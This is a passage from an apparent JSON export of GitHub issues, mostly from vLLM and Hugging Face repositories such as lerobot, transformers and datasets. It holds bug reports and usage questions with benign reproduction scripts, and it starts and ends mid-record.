CPU @ 3.10GHz\nCPU family: 
6\nModel: 106\nThread(s) per core: 1\nCore(s) per socket: 16\nSocket(s): 2\nStepping: 6\nCPU(s) scaling MHz: 23%\nCPU max MHz: 3600.0000\nCPU min MHz: 800.0000\nBogoMIPS: 6200.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 intel_ppin ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect wbnoinvd dtherm ida arat pln pts vnmi avx512vbmi umip pku ospke avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid fsrm md_clear pconfig flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 1.5 MiB (32 instances)\nL1i cache: 1 MiB (32 instances)\nL2 cache: 40 MiB (32 instances)\nL3 cache: 72 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-15\nNUMA node1 CPU(s): 16-3", "url": "https://github.com/vllm-project/vllm/issues/27504", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-25T03:42:44Z", "updated_at": "2025-10-26T07:32:49Z", "comments": 1, "user": "justachetan" }, { "repo": "huggingface/lighteval", "number": 1028, "title": "How to evaluate MMLU-Pro", "body": "Hi,\n\nThank you for the wonderful work!\n\nI just want to ask how to perform the evaluation on MMLU-Pro, as I don't see any related code besides the README.", "url": "https://github.com/huggingface/lighteval/issues/1028", "state": "open", "labels": [], "created_at": "2025-10-24T20:03:10Z", "updated_at": "2025-11-04T10:40:46Z", "user": "qhz991029" }, { "repo": "huggingface/tokenizers", "number": 1879, "title": "rust tokenizer", "body": "Hello.\n\nIs there a Rust tokenizer, please? ChatGPT told me there used to be one.\n\nBest regards!", "url": "https://github.com/huggingface/tokenizers/issues/1879", "state": "open", "labels": [], "created_at": "2025-10-24T17:03:04Z", "updated_at": "2025-10-24T22:03:31Z", "comments": 2, "user": "gogo2464" }, { "repo": "vllm-project/vllm", "number": 27482, "title": "[Bug]: `return_token_ids` missing tokens when using tool calls", "body": "### Your current environment\n\nTesting with the latest vLLM builds from main, as of Fri Oct 24th 2025 (when this bug was opened).\n\n\n### \ud83d\udc1b Describe the bug\n\nThe `return_token_ids` parameter that is supposed to return all generated token ids back to the client is missing quite a few tokens for Chat Completion streaming requests that result in tool calls being generated. Exactly how many and where they are missing in the response will depend on the tool call parser in use as well as the exact request format.\n\nHere's a minimal reproducer.\n\nFirst, run vLLM with a tool call parser and model. 
I use a Granite model for testing here, but it should be roughly the same for any model with a tool call parser.\n\n```\nvllm serve ibm-granite/granite-3.3-8b-instruct \\\n --enable-auto-tool-choice \\\n --tool-call-parser granite\n```\n\nThen, send a streaming tool call request to the server and check the response for missing tokens:\n\n```python\nfrom openai import OpenAI\n\nclient = OpenAI(base_url=\"http://localhost:8000/v1\", api_key=\"fake\")\n\ntools = [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_current_weather\",\n \"description\": \"Get the current weather in a given location\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"location\": { \"type\": \"string\", \"description\": \"The city, e.g. San Francisco, CA\" },\n \"unit\": { \"type\": \"string\", \"enum\": [\"celsius\", \"fahrenheit\"] }\n },\n \"required\": [\"location\"]\n }\n }\n },\n]\nresponse = client.chat.completions.create(\n model=\"ibm-granite/granite-3.3-8b-instruct\",\n messages=[{\"role\": \"user\", \"content\": \"What is the weather in Sydney in celsius?\"}],\n tools=tools,\n tool_choice=\"auto\",\n stream=True,\n stream_options={\n \"include_usage\": True,\n \"continuous_usage_stats\": True,\n },\n extra_body={\"return_token_ids\": True},\n)\n\nreturned_token_ids = []\nlast_completion_tokens = 0\nfor event in response:\n if not getattr(event, \"choices\", None):\n continue\n choice = event.choices[0]\n usage = event.usage\n if hasattr(choice, \"token_ids\"):\n returned_token_ids.extend(choice.token_ids)\n num_token_ids = len(choice.token_ids)\n else:\n num_token_ids = 0\n elapsed_completion_tokens = usage.completion_tokens - last_completion_tokens\n if elapsed_completion_tokens != num_token_ids:\n raise ValueError(\n \"Model generated more tokens than returned by return_token_ids!\\n\"\n f\"All tokens returned so far: {returned_token_ids}\"\n )\n last_completion_tokens = usage.completion_tokens\n```\n\nRunning that, I get the following output:\n\n```\npython return_token_ids_test.py\nTraceback (most recent call last):\n File \"/Volumes/SourceCode/vllm/return_token_ids_test.py\", line 49, in <module>\n raise ValueError(\nValueError: Model generated more tokens than returned by return_token_ids!\nAll tokens returned so far: [49154, 48685]\n```\n\nIf I add a bit of debug logging into vLLM server side and run it again, I can see the list of tokens that should have been returned:\n\n`current_token_ids: [49154, 7739, 8299, 563, 3447, 2645, 563, 313, 16716, 6161, 910, 392, 313, 2243, 563, 313, 3308, 101, 3263, 3918, 313, 426, 563, 313, 371, 81, 1700, 81, 15859, 48685]`\n\nAll of the tokens between the first and last in that list were missed by `return_token_ids`.\n\nThis code is not executed for every generated token when tool call parsers (or, most likely, reasoning parsers) are in use: https://github.com/vllm-project/vllm/blob/61089465a6101790635ed96c26df3e9a57d8d2c9/vllm/entrypoints/openai/serving_chat.py#L1090\n\nThe reason is that we return early at: https://github.com/vllm-project/vllm/blob/61089465a6101790635ed96c26df3e9a57d8d2c9/vllm/entrypoints/openai/serving_chat.py#L1063\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27482", "state": "closed", "labels": [ "bug" ], "created_at": 
"2025-10-24T16:10:31Z", "updated_at": "2025-12-04T19:09:41Z", "comments": 2, "user": "bbrowning" }, { "repo": "vllm-project/vllm", "number": 27479, "title": "[Bug]: Low GPU utilization with Embedding Model", "body": "### Your current environment\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nInitializing LLM(model=\"Qwen/Qwen3-Embedding-0.6B\", task=\"embed\") on a single B200 (180 GB) immediately reserves ~80% GPU memory (likely PagedAttention KV block pre-allocation). During embedding, GPU-Util stays <40%, whereas a naive Transformers inference with batch_size=512 reaches >80% utilization and memory use on the same box.\n\nIs heavy KV cache pre-allocation expected for task=\"embed\" (prefill-only)? And is there any method to improve the GPU-Util?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27479", "state": "open", "labels": [ "bug" ], "created_at": "2025-10-24T15:18:05Z", "updated_at": "2025-10-24T15:25:38Z", "comments": 1, "user": "JhaceLam" }, { "repo": "vllm-project/vllm", "number": 27477, "title": "[Bug]: First prompt token missing when requested with \"echo\"", "body": "### Your current environment\n\nvllm installed from main: \n`vllm 0.11.1rc3.dev23+g61089465a.precompiled`\n\n### \ud83d\udc1b Describe the bug\n\nIs it expected behavior that echo isn't returning the first token of the prompt?\nI am trying to collect the exact prompt_token_ids which went into the model served with vllm serve, so I am doing this:\n```bash\nVLLM_LOGGING_LEVEL=DEBUG vllm serve openai/gpt-oss-20b -tp 1 --enforce-eager --return-tokens-as-token-ids --enable-log-requests --enable-prompt-tokens-details\n```\nand with this snippet:\n```python\nfrom openai import OpenAI\n\nclient = OpenAI(\n api_key=\"EMPTY\", \n base_url=\"http://localhost:8000/v1\"\n)\n\nmessages = [\n {\"role\": \"user\", \"content\": \"Continue: The quick brown fox\"},\n]\n\nresponse = client.chat.completions.create(\n model=\"openai/gpt-oss-20b\",\n messages=messages,\n temperature=0.0,\n max_tokens=1024,\n logprobs=True,\n extra_body={\n \"echo\": True,\n }\n)\n\nprint(response.model_extra['prompt_logprobs'])\n```\n\nI am seeing: `[None, 17360, 200008, ...]` whereas the vllm server logs are printing this: `[200006, 17360, 200008, ...]`, which is correct, as the first token is and should be `200006` == `<|start|>`. Not sure why it is `None` in the ChatCompletion object.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27477", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-24T14:43:50Z", "updated_at": "2025-10-24T15:04:01Z", "comments": 2, "user": "eldarkurtic" }, { "repo": "huggingface/text-generation-inference", "number": 3336, "title": "Get inference endpoint model settings via client", "body": "### Feature request\n\nEnable commands via clients such as `OpenAI` that would get model settings from an inference endpoint. \n\nDoes this exist and I just can't find it?\n\n### Motivation\n\nThere is currently no clear way to get inference model settings directly from an endpoint. Individual base models have their original settings, but this does not necessarily translate to an endpoint. 
As an example, [Microsoft's Phi-3 model](https://huggingface.co/microsoft/Phi-3-mini-128k-instruct) supports 128k context length as input, but if instantiated as an endpoint on a 24GB GPU the allowed input context length is less (48k).\n\nThe only way I have found to access the information regarding an individual endpoint is via `huggingface_hub`, specifically:\n\n```\nfrom huggingface_hub import get_inference_endpoint\nendpoint = get_inference_endpoint(ENDPOINT_NAME, namespace=USERNAME, token=api_key)\n```\n\nTo get the general settings, you can then access the `raw` dict of the endpoint's image. For example, if I want to get the context length of a specific model at an endpoint, I can do it this way:\n```\n# the settings/specs of the endpoint in a 'llamacpp' image\nsettings = endpoint.raw['model']['image']['llamacpp']\n# this allows me to get info like context length (via the ['ctxSize'] key)\n>>> print(settings['ctxSize'])\n48000\n```\n\nThis is problematic when sending prompts to an endpoint - if it were easier to query model properties programmatically, then I could write code to adjust queries on the fly appropriately depending on the target model. As it is, the sender needs to know the properties of a particular endpoint beforehand. IMO what is needed is to be able to get this info directly from a client.\n\nIn the OpenAI client in the Huggingface Inference API there seems to be some functionality for this, i.e. I can instantiate a client:\n```\nclient = OpenAI(\n base_url=endpoint, # AWS/server URL\n api_key=api_key, # huggingface token\n )\n```\nThen I can get a list of models at that URL:\n```\nprint(client.models.list())\n```\nBut this only prints out basic information, which doesn't include such things as context length. Is there a way to get this info from the client that I'm just missing? I have noticed when there are errors related to input length, the client returns an error with the key `n_ctx`. For example, if a model I'm working with has a 12k context window and I send 13k tokens, the error is:\n```\nopenai.BadRequestError: Error code: 400 - {'error': {'code': 400, 'message': 'the request exceeds the available context size, try increasing it', 'type': 'exceed_context_size_error', 'n_prompt_tokens': 13954, 'n_ctx': 12032}}\n```\nThis tells me that the client has access to the overall settings, but it's not clear to me how to get them.\n\n### Your contribution\n\nHappy to work on this if someone can point me to where to look for relevant code that would pass inference endpoint settings info to the client, perhaps via the `client.models.list()` method.", "url": "https://github.com/huggingface/text-generation-inference/issues/3336", "state": "closed", "labels": [], "created_at": "2025-10-24T13:07:15Z", "updated_at": "2025-10-30T14:10:46Z", "comments": 1, "user": "lingdoc" }, { "repo": "huggingface/datasets", "number": 7829, "title": "Memory leak / Large memory usage with num_workers = 0 and numerous datasets within DatasetDict", "body": "### Describe the bug\n\nHi team, first off, I love the datasets library! 
\ud83e\udd70\n\nI'm encountering a potential memory leak / increasing memory usage when training a model on a very large DatasetDict.\n\nSetup: I have a DatasetDict containing 362 distinct datasets, which sum up to ~2.8 billion rows.\n\nTraining Task: I'm performing contrastive learning with SentenceTransformer and Accelerate on a single node with 4 H100 GPUs, which requires me to sample from only one dataset at a time.\n\nTraining Loop: At each training step, I sample ~16,000 examples from a single dataset, and then switch to a different dataset for the next step. I iterate through all 362 datasets this way. \n\nProblem: The process's memory usage continuously increases over time, eventually causing a stall where the GPUs stop working. It seems memory from previously sampled datasets isn't being released. I've set num_workers=0 for all experiments.\n\nChart 1: Standard DatasetDict. The memory usage grows steadily until it stalls the training (RSS memory). \"Image\"\n\nChart 2: IterableDatasetDict. I also tried using IterableDatasetDict and IterableDataset. The memory curve is \"smoother,\" but the result is the same: it grows indefinitely and the training stalls. \"Image\"\n\nAny feedback or guidance on how to manage this memory would be greatly appreciated!\n\n### Steps to reproduce the bug\n\nWIP; I'll add some code that manages to reproduce this error, but it's not straightforward. \n\n### Expected behavior\n\nThe memory usage should remain relatively constant or plateau after a few steps. Memory used for sampling one dataset should be released before or during the sampling of the next dataset.\n\n### Environment info\n\nPython: 3.12\nDatasets: 4.3.0\nSentenceTransformers: 5.1.1", "url": "https://github.com/huggingface/datasets/issues/7829", "state": "open", "labels": [], "created_at": "2025-10-24T09:51:38Z", "updated_at": "2025-11-06T13:31:26Z", "comments": 4, "user": "raphaelsty" }, { "repo": "huggingface/transformers", "number": 41842, "title": "Incorrect usage of `num_items_in_batch`?", "body": "It seems that `num_items_in_batch` is computed for all items in the batch [here](https://github.com/huggingface/transformers/blob/9c20660138830ca362533551ca978c27b48283a1/src/transformers/trainer.py#L2430).\n\nHowever, when the loss is computed in the `training_step`, it is computed for each input in the batch one by one. 
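Concretely, the interplay looks roughly like this (a simplified sketch of the accumulation loop, not the actual Trainer code; `chunks` and the loss call are illustrative):\n\n```python\n# Simplified sketch (illustrative, not the actual Trainer code) of how a\n# whole-batch num_items_in_batch interacts with chunk-by-chunk loss computation.\nimport torch\nimport torch.nn.functional as F\n\ndef training_step(chunks, num_items_in_batch):\n    total_loss = torch.tensor(0.0)\n    for logits, labels in chunks:  # each input processed one by one\n        # Sum of per-token losses within this chunk only...\n        chunk_loss = F.cross_entropy(logits, labels, reduction=\"sum\")\n        # ...normalized by the token count of the *whole* batch.\n        total_loss = total_loss + chunk_loss / num_items_in_batch\n    # Summing chunk_sum / batch_total over all chunks equals\n    # (sum of all per-token losses) / batch_total, i.e. the correct global\n    # mean, which is the usual argument for passing the whole-batch count.\n    return total_loss\n```\n\n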
Does it make sense to pass `num_items_in_batch` (for the whole batch) or should that number be for that particular input only?\n\nRight now, the entire batch's `num_items_in_batch` is used [here](https://github.com/huggingface/transformers/blob/9c20660138830ca362533551ca978c27b48283a1/src/transformers/trainer.py#L2486).", "url": "https://github.com/huggingface/transformers/issues/41842", "state": "closed", "labels": [], "created_at": "2025-10-24T07:36:00Z", "updated_at": "2025-12-01T08:02:48Z", "comments": 2, "user": "gohar94" }, { "repo": "vllm-project/vllm", "number": 27463, "title": "[Usage]: How to request DeepSeek-OCR with http request", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nI want to request DeepSeek-OCR over HTTP; is there any example for it?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27463", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-24T07:07:29Z", "updated_at": "2025-10-29T17:26:49Z", "comments": 8, "user": "YosanHo" }, { "repo": "huggingface/lerobot", "number": 2306, "title": "how to use groot without flash attention", "body": "My system is Ubuntu 20.04 with glibc 2.3.1, which does not support Flash Attention. Can I modify the config of groot to use it with normal attention?", "url": "https://github.com/huggingface/lerobot/issues/2306", "state": "open", "labels": [ "question", "policies", "dependencies" ], "created_at": "2025-10-24T06:35:18Z", "updated_at": "2025-11-04T01:28:38Z", "user": "shs822" }, { "repo": "huggingface/lerobot", "number": 2305, "title": "Error dependence about the `Transformer` library", "body": "### System Info\n\n```Shell\n- lerobot version: 0.4.0\n- Platform: Linux-6.14.0-29-generic-x86_64-with-glibc2.39\n- Python version: 3.12.12\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.2.6\n- PyTorch version: 2.7.0+cu128\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.8\n- GPU model: NVIDIA RTX PRO 6000 Blackwell Workstation Edition\n- Using GPU in script?: \n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n# Environment\n\nI used the `uv` tool to auto-resolve the environment. 
The `pyproject.toml` is shown as follows.\n```\n[project]\nname = \"openpi-pytorch-env2\"\nversion = \"0.1.0\"\ndescription = \"Add your description here\"\nrequires-python = \"==3.12.12\"\ndependencies = [\n # PyTorch dependencies\n \"torch==2.7.0\",\n \"torchvision==0.22.0\",\n \"torchaudio==2.7.0\",\n \"pytorch_lightning\",\n\n # lerobot-libero\n \"libero @ git+https://github.com/huggingface/lerobot-libero.git#egg=libero\",\n\n # lerobot\n \"lerobot[all] @ git+https://github.com/huggingface/lerobot.git@v0.4.0\",\n\n]\n\n[tool.uv.sources]\ntorch = { index = \"pytorch-cu128\" }\ntorchvision = { index = \"pytorch-cu128\" }\ntorchaudio = { index = \"pytorch-cu128\" }\n\n[[tool.uv.index]]\nname = \"pytorch-cu128\"\nurl = \"https://download.pytorch.org/whl/cu128\"\nexplicit = true\n```\n\n# BUG Report\n\nWhen I ran the `pi0` code\n\n```\nimport os\nimport torch\nfrom lerobot.policies.pi0.modeling_pi0 import PI0Policy\nfrom transformers import AutoTokenizer\nMODEL_PATH = os.path.expanduser(\"~/Models/pi0_base\")\npolicy = PI0Policy.from_pretrained(MODEL_PATH)\n```\n\nI got errors like:\n\n\n```\nAn incorrect transformer version is used, please create an issue on https://github.com/huggingface/lerobot/issues\nImportError: cannot import name 'check' from 'transformers.models.siglip' (/opt/miniforge3/envs/pi0_torch2/lib/python3.12/site-packages/transformers/models/siglip/__init__.py)\n\nDuring handling of the above exception, another exception occurred:\n\n File \"/home/robot/pi0/openpi_pytorch2/test_simple.py\", line 22, in \n policy = PI0Policy.from_pretrained(MODEL_PATH)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nValueError: An incorrect transformer version is used, please create an issue on https://github.com/huggingface/lerobot/issues\n```\n\nThe transformers lib version is auto-resolved from the `pyproject.toml` in the `lerobot` lib. Can you fix the error? Thanks\n\n### Expected behavior\n\nLoading the weights successfully.", "url": "https://github.com/huggingface/lerobot/issues/2305", "state": "open", "labels": [ "question", "policies", "dependencies" ], "created_at": "2025-10-24T05:59:32Z", "updated_at": "2025-11-14T16:01:49Z", "user": "sunshineharry" }, { "repo": "vllm-project/vllm", "number": 27454, "title": "[Usage]: How to set the expert id on each EP by myself after setting EP in Deepseek (how to reorder experts?)", "body": "### Your current environment\n\n```text\nvllm 0.8.5\n```\n\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27454", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-24T03:15:16Z", "updated_at": "2025-10-24T07:27:50Z", "comments": 2, "user": "HameWu" }, { "repo": "vllm-project/vllm", "number": 27448, "title": "[Usage]: how to pass multi turn multimode messages to Vllm?", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). 
I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27448", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-24T02:41:45Z", "updated_at": "2025-10-24T03:33:13Z", "comments": 1, "user": "cqray1990" }, { "repo": "huggingface/lerobot", "number": 2304, "title": "How to load local model?", "body": "For example, I'm trying to fine-tune pi0, so I downloaded pi0_base locally and saved it in [position A, like lerobot/models/pi0_base], which has 5 files in total, including model.safetensors.\n\nThen how do I load it in code? I used to just set model.path=[position A], but following the tutorial, it uses pretrained_path_or_name as the keyword.\n\nHowever, my code raised an error here:\n```python\n print(f\"Loading model from: {pretrained_name_or_path}\")\n try:\n from transformers.utils import cached_file\n\n # Try safetensors first\n resolved_file = cached_file(\n pretrained_name_or_path,\n \"model.safetensors\",\n cache_dir=kwargs.get(\"cache_dir\"),\n force_download=kwargs.get(\"force_download\", False),\n resume_download=kwargs.get(\"resume_download\"),\n proxies=kwargs.get(\"proxies\"),\n use_auth_token=kwargs.get(\"use_auth_token\"),\n revision=kwargs.get(\"revision\"),\n # local_files_only=kwargs.get(\"local_files_only\", False),\n local_files_only=True # I set this for experiment but failed too\n )\n from safetensors.torch import load_file\n\n original_state_dict = load_file(resolved_file)\n print(\"\u2713 Loaded state dict from model.safetensors\")\n except Exception as e:\n print(f\"Could not load state dict from remote files: {e}\")\n print(\"Returning model without loading pretrained weights\")\n return model\n```\nIts output:\nLoading model from: /home/user/working_folder/lerobot/local/model/pi0_base (I use this absolute path) \nCould not load state dict from remote files: /home/user/working_folder/lerobot/local/model/pi0_base does not appear to have a file named model.safetensors. Checkout 'https://huggingface.co//home/user/working_folder/lerobot/local/model/pi0_base/tree/main' for available files.\n\nIt seems that the program sees my pretrained_name_or_path as a repo_id :/\n\nHow can I point it at a local pretrained path?\n\n* OK, I know that my file is incorrect. It's my mistake, not the code's.\n", "url": "https://github.com/huggingface/lerobot/issues/2304", "state": "closed", "labels": [], "created_at": "2025-10-24T01:59:26Z", "updated_at": "2025-10-24T02:33:25Z", "user": "milong26" }, { "repo": "vllm-project/vllm", "number": 27441, "title": "[Bug]: vllm/v1/core/sched/scheduler.py: Unintended reordering of requests during scheduling", "body": "### Your current environment\n\n
\nThis error is independent of the environment.\n
\n\n\n### \ud83d\udc1b Describe the bug\n\n### Description\nThe function `schedule()` in [vllm/v1/core/sched/scheduler.py](https://github.com/vllm-project/vllm/blob/main/vllm/v1/core/sched/scheduler.py) is responsible for scheduling inference requests.\n\nIn certain cases \u2014 such as when a request is waiting for KV blocks from a remote prefill worker or when the token budget is exhausted \u2014 the request must be reinserted into the waiting queue `self.waiting`.\n\nCurrently, the implementation pops such requests, prepends them to skipped_waiting_requests, and then prepends skipped_waiting_requests back to self.waiting.\nHowever, this behavior can shuffle the request order, potentially impacting the tail latency of request serving.\n\n### How to Fix\nReplace all calls to `skipped_waiting_requests.prepend_request(request)` with `skipped_waiting_requests.add_request(request)`.\n\n### Result\n\"Image\"\n\nThe figure compares the request-serving timelines of the original (left) and fixed (right) versions.\n* X-axis: Time\n* Y-axis: Request ID (submission order)\n* Green: Duration while the request is in `self.waiting`\n* Black: Time between GPU memory allocation and completion of the request\u2019s prefill computation\n* Red: Time between the end of prefill computation and GPU memory release (while waiting for the remote decoder to read KV blocks)\n\nThe scheduling policy used is FCFS.\nIn the original version, requests are shuffled under resource pressure. After applying the fix, the request serving order remains consistent, as expected.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27441", "state": "open", "labels": [ "bug" ], "created_at": "2025-10-23T22:35:50Z", "updated_at": "2025-11-22T04:20:35Z", "comments": 1, "user": "dongha-yoon" }, { "repo": "huggingface/lerobot", "number": 2303, "title": "Question: Does the follower arm have an api for scripting movement?", "body": "Hi, apologies if this has been answered before or if it's not the right place to ask. I've been using the SO-101 arms for imitation learning, but recently I've wanted to try and test out the follower arm for embodied reasoning models such as Gemini ER 1.5. To do this, I figure I would need to have some way to map outputs from the ER model (coordinates or general, high-level movements) to movements for the SO-101. Does the SO-101 have an API for this type of low-level movement control, e.g. if I just wanted to move it along a pre-scripted path using coordinates or motor motion? What would the code for this type of low-level movement look like? 
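Something like the sketch below is what I'm imagining (purely illustrative; the class names, config fields, and action keys are my assumptions based on lerobot's robot API and may differ across versions):\n\n```python\n# Hypothetical sketch of scripted joint-space control of an SO-101 follower\n# with lerobot's robot API. SO101Follower / SO101FollowerConfig and the\n# \"<joint>.pos\" action keys are assumptions -- check lerobot.robots in your\n# installed version for the real names.\nimport time\n\nfrom lerobot.robots.so101_follower import SO101Follower, SO101FollowerConfig\n\nconfig = SO101FollowerConfig(port=\"/dev/ttyACM0\", id=\"my_follower_arm\")\nrobot = SO101Follower(config)\nrobot.connect()\n\n# Joint targets are plain floats keyed by joint name, so an ER model's output\n# (coordinates or high-level moves) could be mapped onto dicts like these.\nwaypoints = [\n    {\"shoulder_pan.pos\": 0.0, \"shoulder_lift.pos\": -20.0, \"elbow_flex.pos\": 30.0,\n     \"wrist_flex.pos\": 0.0, \"wrist_roll.pos\": 0.0, \"gripper.pos\": 10.0},\n    {\"shoulder_pan.pos\": 15.0, \"shoulder_lift.pos\": -10.0, \"elbow_flex.pos\": 45.0,\n     \"wrist_flex.pos\": 5.0, \"wrist_roll.pos\": 0.0, \"gripper.pos\": 50.0},\n]\n\nfor action in waypoints:\n    robot.send_action(action)  # low-level command, no learned policy involved\n    time.sleep(1.0)            # crude pacing between waypoints\n\nrobot.disconnect()\n```\n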
\n\nThank you so much for any and all help!", "url": "https://github.com/huggingface/lerobot/issues/2303", "state": "open", "labels": [ "question", "robots", "python" ], "created_at": "2025-10-23T20:40:56Z", "updated_at": "2025-10-23T22:29:28Z", "user": "Buttmunky1" }, { "repo": "huggingface/lerobot", "number": 2294, "title": "Question about the HuggingFaceVLA/smolvla_libero Model Configuration", "body": "Hello,\n\nLerobot has officially ported [LIBERO](https://github.com/huggingface/lerobot/issues/1369#issuecomment-3323183721), and we can use the checkpoint at [HuggingFaceVLA/smolvla_libero](https://huggingface.co/HuggingFaceVLA/smolvla_libero) to evaluate the LIBERO benchmark.\n\nHowever, the model configuration of [HuggingFaceVLA/smolvla_libero](https://huggingface.co/HuggingFaceVLA/smolvla_libero) appears to differ from the [original model](https://huggingface.co/lerobot/smolvla_base). For example:\n\n[lerobot/smolvla_base](https://huggingface.co/lerobot/smolvla_base/blob/main/config.json)\n```json\n{\n \"vlm_model_name\": \"HuggingFaceTB/SmolVLM2-500M-Video-Instruct\",\n \"load_vlm_weights\": true,\n \"add_image_special_tokens\": false,\n \"attention_mode\": \"cross_attn\",\n \"prefix_length\": 0,\n \"pad_language_to\": \"max_length\",\n \"num_expert_layers\": 0,\n \"num_vlm_layers\": 16,\n \"self_attn_every_n_layers\": 2,\n \"expert_width_multiplier\": 0.75\n}\n```\n\n[HuggingFaceVLA/smolvla_libero](https://huggingface.co/HuggingFaceVLA/smolvla_libero/blob/main/config.json)\n```json\n{\n \"vlm_model_name\": \"HuggingFaceTB/SmolVLM2-500M-Instruct\",\n \"load_vlm_weights\": true,\n \"add_image_special_tokens\": false,\n \"attention_mode\": \"cross_attn\",\n \"prefix_length\": 0,\n \"pad_language_to\": \"longest\",\n \"num_expert_layers\": -1,\n \"num_vlm_layers\": 0, <- it becomes 32 when model is initialized\n \"self_attn_every_n_layers\": 2,\n \"expert_width_multiplier\": 0.5,\n}\n```\n\nIn particular, `num_vlm_layers` ends up using all 32 layers, which is not consistent with the [paper](https://arxiv.org/pdf/2506.01844), where they use half of them (16 layers).\nCould you provide the original model checkpoint and the training recipe so we can reproduce the LIBERO benchmark performance?", "url": "https://github.com/huggingface/lerobot/issues/2294", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-10-23T13:37:48Z", "updated_at": "2025-10-30T07:49:17Z", "user": "Hesh0629" }, { "repo": "vllm-project/vllm", "number": 27413, "title": "[Usage]: how to request a qwen2.5-VL-7B classify model served by vllm using openai SDK?", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nI launch a server with the following command to serve a Qwen2.5-VL-7B model finetuned for sequence classification. 
(this model replaced the lm_head with a 2 classes score_head)\n\nThe launch command is :\n```\nvllm serve --model=//video_classification/qwenvl_7b_video_cls/v5-20251011-121851/2340_vllm_format --served_model_name Qwen2.5-7B-shenhe --task=classify --port=8080 --tensor-parallel-size=2\n```\n\nI don't know how to request the server with the openAI sdk.\nI use the code snnipet showed below which works well with pure text, but it got 400 bad request when I put the video url into the prompt\n\nthis works well:\n```\n# SPDX-License-Identifier: Apache-2.0\n# SPDX-FileCopyrightText: Copyright contributors to the vLLM project\n\"\"\"Example Python client for classification API using vLLM API server\nNOTE:\n start a supported classification model server with `vllm serve`, e.g.\n vllm serve jason9693/Qwen2.5-1.5B-apeach\n\"\"\"\n\nimport argparse\nimport pprint\n\nimport requests\n\n\ndef post_http_request(payload: dict, api_url: str) -> requests.Response:\n headers = {\"User-Agent\": \"Test Client\"}\n response = requests.post(api_url, headers=headers, json=payload)\n return response\n\n\ndef parse_args():\n parse = argparse.ArgumentParser()\n parse.add_argument(\"--host\", type=str, default=\"localhost\")\n parse.add_argument(\"--port\", type=int, default=8000)\n parse.add_argument(\"--model\", type=str, default=\"jason9693/Qwen2.5-1.5B-apeach\")\n return parse.parse_args()\n\n\ndef main(args):\n host = args.host\n port = args.port\n model_name = args.model\n\n api_url = f\"http://{host}:{port}/classify\"\n prompts = [\n \"Hello, my name is\",\n \"The president of the United States is\",\n \"The capital of France is\",\n \"The future of AI is\",\n ]\n\n payload = {\n 